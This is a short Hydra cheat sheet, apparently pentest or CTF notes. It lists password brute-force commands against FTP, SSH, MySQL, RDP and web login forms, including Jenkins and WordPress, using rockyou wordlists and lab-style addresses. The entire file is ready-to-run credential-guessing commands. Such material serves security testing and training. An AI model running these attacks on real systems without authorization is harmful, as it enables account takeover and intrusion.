hydra -P <wordlist> -v <ip> <protocol>                                                                 # General example (-v is verbose)
hydra -L users.list -P /usr/share/wordlists/rockyou.txt example.box mysql                              # Bruteforce mysql a list of users
hydra -t 4 -l mike -P /usr/share/wordlists/rockyou.txt 10.10.10.10 ftp                                 # Bruteforce ftp for user mike using 4 threads
hydra -t 4 -l john -P /usr/share/seclists/Passwords/Leaked-Databases/rockyou-50.txt 10.10.10.10 ssh    # Bruteforce ssh for user john using 4 thread
hydra -t 1 -V -f -l dministrator -P wordlist.txt rdp://10.10.10.10                                     # Windows Remote Desktop with a password list.

# bruteforce a webform filtering out Failures (F=failure text)
hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.10.10 http-post-form "/:username=^USER^&password=^PASS^:F=incorrect"

# bruteforce a webform on another port (s=port) [In this case jenkins]
hydra -l admin -P /usr/share/wordlists/rockyou.txt 127.0.0.1 -s 8080 http-form-post '/j_acegi_security_check:j_username=^USER^&j_password=^PASS^&from=%2F&Submit=Sign+in:F=Invalid'

# bruteforce a webform filtering for success (S=success text)
hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.10.10 -V http-form-post '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:S=Location'